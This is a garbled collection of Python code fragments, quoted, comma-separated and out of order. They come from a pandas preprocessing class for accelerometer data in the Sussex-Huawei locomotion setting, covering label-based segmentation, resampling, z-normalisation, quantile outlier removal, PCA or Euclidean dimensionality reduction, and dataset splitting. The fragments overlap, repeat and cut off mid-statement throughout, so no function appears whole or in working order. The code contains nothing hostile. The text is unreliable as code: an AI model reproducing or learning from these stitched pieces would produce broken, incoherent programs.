:param data: :param columns: :param mean:", "split') data_len = data.shape[0] test_len = int(data_len * test_sz) train_len = int(data_len *", "data[column] - data[args[ind]] return data if mode == 'orientation': if len(target_columns)+1 != len(args):", "not None: data[columns] = (data[columns] - mean) / std else: data = (data", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self,", "if columns is not None: mean = data[columns].mean() std = data[columns].std() data[columns] =", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None):", "not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "approach via TS Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()]", ") #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works", "= ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5]", "import ReplacementValReplacementStrategy from overrides import overrides import traceback import os import pandas from", "== 'gravity': if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns):", "str) 
or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return data", "== 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced", "= data.index data = data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1) data = data.set_index(old_index)", "args=selected_coarse_labels) data_test_segments = [] for car_segment in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label',", "better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind in range(len(data_valid_segments)):", "for car_segment in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data, config, meta_data): \"\"\" Apply all", "data): \"\"\" Change representation of a data set. :param current_representation: :param target_representation: :param", "data.mean() std = data.std() data = (data - data.mean()) / data.std() elif mean", "selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test,", "on quantile or a threshold value. 
:param data: :param replacement_mode: :param columns: :param", ":return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None", "'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise", "= data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns): data[column] = data[column]", "List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]]", "= data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5,", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self,", ") for road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label',", "data = data.reset_index(drop=True) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except 
Exception:", "chunk_size + 1, axis=0) # 1. Ensure index is datetime index and standardize", "in min_length_subsegements: segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode", "target_columns: :param mode: :param args: :return: \"\"\" try: if data is None or", "is not None: mean = data[columns].mean() std = data[columns].std() data[columns] = (data[columns] -", "= pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return data except (TypeError, NotImplementedError, ValueError):", "label column, semantic segementation of a fixed interval. :param data: :param mode: :param", "@0.95 for classical approach via TS Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns)", "~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3)", "= data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row')", "= data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index data = pandas.concat([data, reduced], axis=1)", "NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns = None): \"\"\"", "print('Normalizing, outlier removal') selected_columns = ['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train,", "None: 
data = data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True)", "\"\"\" try: if data is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "too long or too short after splitting min_length_subsegements = [] for segment in", "is None: data = data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data =", "params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1],", "= self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach", "data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid", ":param mode: :param args: :return: \"\"\" try: if data is None or target_columns", "= self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None, axis = 0): \"\"\" Desegements", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(column, str) or not", "segments: segment.index = 
pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove segments that are too long", "= self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for car_segment in car_test_segments: road_segments", "isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys() for column in columns):", "= config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label data,", "if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind below calculation", "data segments = split(data, segment_length) if not exact_length: for segment in segments: segment.index", "data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via TS", "not aggregate: for segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample", "aggregate: for segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. 
Resample and", "make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train", "data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing,", "isinstance(mode, str) or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': #", "Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better than euclidean", "pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove segments that are too long or too short", "import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def segment_data(self, data, mode, label_column=None,", "data: :param mode: :param label_column: :param args: :return: \"\"\" try: if data is", "'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train =", "data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for", "std is None: if columns is not None: mean = data[columns].mean() std =", "unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(column, str)", "or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, 
pandas.DataFrame) or not isinstance(mode,", "return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)", "if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data,", "Apply z-normalization to a data set. :param data: :param columns: :param mean: :param", "unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None, axis = 0): \"\"\"", "/ data.std() elif mean is not None and std is not None: if", "TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract", "args=selected_road_labels ) for road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test, mode='labels',", "= 0): \"\"\" Desegements as time series. 
:param data_segments: :param selected_columns: :param axis:", "quantile=0.99 # current run @0.95 for classical approach via TS Fresh )[:-2] #Test", "self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data =", "data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param data: :param replacement_mode: string, 'mean', 'replacement_val',", "args: selected_data = data[data[label_column] == target_label] # 2. Split by non-subsequent indices #", "# to center around 0.0 substract 0.5 else: data = (data - data.min())", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self,", "data.drop(index_names, inplace=True) old_index = data.index data = data.reset_index(drop=False) data = data.set_index(old_index) return data", "column, semantic segementation of a fixed interval. :param data: :param mode: :param label_column:", "reduced_column_name = 'reduced', columns = None): \"\"\" Apply a dimensionality reduction technique to", "Segements a time series based on a label column, semantic segementation of a", "pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values selected_data_segments = [group for _, group in", "type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. 
Segment data segments = split(data, segment_length) if not", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data, freq, mode", "int(data_len * test_sz) train_len = int(data_len * train_sz) valid_len = int(data_len * valid_sz)", "selected_columns = ['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data =", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts unix time", "None or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not", "columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and std is None: if columns", "'custom_function': if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column] =", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or", "import overrides import traceback import os import pandas from sklearn.decomposition import PCA import", "current_representation, target_representation, data): \"\"\" Change representation of a data set. 
:param current_representation: :param", "selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms'", "args=selected_road_labels ) for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind in range(len(data_train_segments)):", "pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode ==", "for car_segment in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment", "# '1000ms' mean_train = meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time unit, remove nans')", "if not all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean", "segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "def inference_split_process(self, data, config, meta_data): \"\"\" Apply all preprocessing steps necessary for inference.", "data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz #Test for ind in range(len(data_test_segments)):", "selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2],", "raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and std is None: if columns is", "= 
data[columns].mean() std = data[columns].std() data[columns] = (data[columns] - data[columns].mean()) / data[columns].std() else:", "remove nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True,", "https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None or column is None or", "self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'],", "reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index data = pandas.concat([data, reduced],", "isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or mode is None: return", "['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data,", "necessary for inference. :param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame", "labels = labels test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns", "mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if len(target_columns) != len(args):", "not exact_length: for segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. 
Remove", "non_sequence.cumsum().values selected_data_segments = [group for _, group in selected_data.groupby(grouper)] for segment in selected_data_segments:", "pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return", "self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind],", "= data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'pca': # Source:", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels, data):", "behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in", "pca = PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced =", "'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca =", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: 
self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels,", "not isinstance(mode, str) or not isinstance(target_columns, list): raise TypeError(type(data)) if mode == 'mean_estimate_gravity':", "label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for car_segment in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels',", "labels test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x',", "selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run", "categorical features using an encoding function. :param data: :param mode: :param columns: :param", "features using an encoding function. :param data: :param mode: :param columns: :param encoding_function:", "range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in range(len(data_valid_segments)):", ":return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame):", "\"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns =", "if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column] = encoding_function(data[column])", "standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. 
Segment data segments = split(data, segment_length) if", "self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current", "== target_label] # 2. Split by non-subsequent indices # Source for next 3", "isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(target_columns, list): raise TypeError(type(data)) if", "data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\" Project accelerometer", "raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names", "interval. 
:param data: :param mode: :param label_column: :param args: :return: \"\"\" try: if", "or mode is None or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "= self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 #", "replacement_mode: :return: \"\"\" try: if data is None or replacement_mode is None or", "= None, mean = None, std = None): \"\"\" Apply z-normalization to a", "value. :param data: :param replacement_mode: :param columns: :param quantile: :param threshold: :return: \"\"\"", "None: segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError,", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(target_columns,", "/ (data.max() - data.min()) # to center around 0.0 substract 0.5 return data", "not isinstance(data, pandas.DataFrame) or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean'", "return data if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError,", "and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. 
Segment data segments = split(data, segment_length)", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation,", "= data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid", "in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode,", "data matrix. :param labels: :param data: :return: \"\"\" try: if data is None", "in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and std is None: if", "config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train'] std_train = meta_data['std_train']", "by non-subsequent indices # Source for next 3 lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index", ":return: \"\"\" try: if data is None or replacement_mode is None or unwanted_labels", "== 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # 
https://en.wikipedia.org/wiki/Principal_component_analysis pca", "# 8000 1.25 Hz #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind]", "\"\"\" Remove NaNs :param data: :param replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param replacement_value:", "self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for", "'fixed_interval': segment_length = args[0] aggregate = args[1] exact_length = args[2] segments_aggregated = []", "try: if data is None or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "Combines labels vector and data matrix. :param labels: :param data: :return: \"\"\" try:", "for ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for", "class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def segment_data(self, data, mode, label_column=None, args=None): \"\"\"", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns,", "data.index data = data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1) data = data.set_index(old_index) return", "= data.set_index(old_index) return data if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, 
data, columns = None, mean =", "columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around", "data, remove nans') data = self.convert_unix_to_datetime(data, column = 'time', unit = 'ms') data", "'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "/ std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except (TypeError, NotImplementedError, ValueError):", "segments = split(data, segment_length) if not exact_length: for segment in segments: segment.index =", "ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train", "data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] =", "#print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] =", "self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' )", "for ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than", 
"Split by non-subsequent indices # Source for next 3 lines after comment: #", "None or mode is None or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if encoding_function is", "min_length_subsegements = [] for segment in segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if", "self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' )", "Source for next 7 lines of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column", "\"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None or", "pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels = labels test_sz = 